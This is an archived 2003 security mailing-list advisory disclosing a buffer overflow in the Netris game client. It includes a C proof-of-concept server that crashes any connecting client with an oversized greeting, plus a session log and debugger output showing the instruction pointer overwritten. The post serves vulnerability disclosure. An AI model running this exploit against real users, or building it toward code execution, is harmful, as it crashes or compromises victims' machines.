Netris client Buffer Overflow Vulnerability.

From: Shaun Colley (shaunigeat_private)
Date: Tue Aug 12 2003 - 10:03:02 PDT

Next message: Sebastian Krahmer: "SuSE Security Announcement: kernel (SuSE-SA:2003:034)"

Previous message: Troy Murray: "RE: Microsoft RPC DCOM exploit descriptions"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-[INTRODUCTION]-

Netris is a Linux clone of the classic infamous game
Tetr*s, giving users three main game modes:  play an
individual game, server mode: bind to a port and wait
for an incoming connection from an opponents Netris
client, and connect mode: connect to an opponents
Netris client which is listening for connections on a
selected port.  A vulnerability has already been
discovered
(http://www.securityfocus.com/bid/5680/info/) that
when Netris is ran in listen mode, it leaves itself
open to a "critical" buffer overflow vulnerability due
to insufficient bounds checking, which could result in
root privileges for the attacker, else the UID of the
user running Netris.  However, I have discovered a new
vulnerability in which Netris is also vulnerable to a
similar buffer overflow attack when running in client
mode (connecting to a remote opponents Netris client
in listen mode, rather than listening for an incoming
connection), due to insufficient bounds checking of
what the server sends.

-[EXPLOIT]-

The following code is a small PoC exploit program I
have written to exploit the existing buffer overflow
vulnerability, causing DoS (corruption of stack,
crashing of Netris program), which binds itself to a
port, and exploits the Buffer Overflow Vulnerability
in the Netris program, when a Netris client attempts
to connect:-


------------------------CUT HERE----------------------

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define BACKLOG 1
int main(int argc, char *argv[]) {
        if(argc < 2) {
                printf("Usage: %s <port>\n", argv[0]);
                exit(-1);
        }

        int sock, csock, i;
        struct sockaddr_in client;
        struct sockaddr_in me;
        int sinlen;
        char buffer[60001];

        memset(buffer, 'a', 60000);

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) ==
NULL) {
                printf("Couldn't create socket!\n");
                exit(-1);
        }

        me.sin_family = AF_INET;
        me.sin_port = htons(atoi(argv[1]));
        me.sin_addr.s_addr = INADDR_ANY;
        if(bind(sock, (struct sockaddr *)&me,
sizeof(struct sockaddr)) == -1) {
        perror("bind()");
        exit(-1);
        }
        listen(sock, BACKLOG);
        printf("Listening on port %s for
connections...\n", argv[1]);
        sinlen = sizeof(struct sockaddr);
        while(1) {
                csock = accept(sock, (struct sockaddr
*)&client, &sinlen);
                printf("Got connection,
sending...\n");
                send(csock, buffer, strlen(buffer),
0);
                sleep(1);
                close(csock);
        }
}
------------------------CUT HERE----------------------


Here is a simple example of the exploitation process
of the Netris program:

------------------------CUT HERE----------------------

[shaunige@localhost exploits]$ ./netris-exploit 1234
Listening on port 1234 for connections...
Got connection, sending...  

# whilst meantime in the other window:

[shaunige@localhost shaunige]$ netris -c localhost -p
1234
Your opponent is using an old, incompatible version
                                                   of
Netris.  They should get the latest version.
                  Segmentation fault (core dumped)

[shaunige@localhost shaunige]$ gdb -c core.13140
GNU gdb 5.2.1-2mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General
Public License, and you are
welcome to change it and/or distribute copies of it
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show
warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu".
Core was generated by `netris -c localhost -p 1234'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) quit
[shaunige@localhost shaunige]$

------------------------CUT HERE----------------------

As you can see, I tried to connect to what I thought
was my to-be opponents Netris program in listen mode,
and the listening server sent a huge string to the
client, overflowing the buffer in which Netris is
expecting to receive greetings from the remote Netris
program, asking it to start the game.

Obviously, the vulnerability can be instead exploited
by an attacker to execute arbitrary code on the
victim's machine, with the privileges of the user
running Netris to connect to the listening port,
rather than simply causing a DoS situation.


-[PATCH/WORKAROUND]-

I have not yet written a patch to fix this
vulnerability in Netris, I am in the process of
contacting the vendor regarding this matter.


-[CREDIT]-

I discovered this vulnerability on 11/08/03.



Thank you for your time.
Shaun.






________________________________________________________________________
Want to chat instantly with your online friends?  Get the FREE Yahoo!
Messenger http://uk.messenger.yahoo.com/

Next message: Sebastian Krahmer: "SuSE Security Announcement: kernel (SuSE-SA:2003:034)"
Previous message: Troy Murray: "RE: Microsoft RPC DCOM exploit descriptions"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Aug 12 2003 - 10:59:30 PDT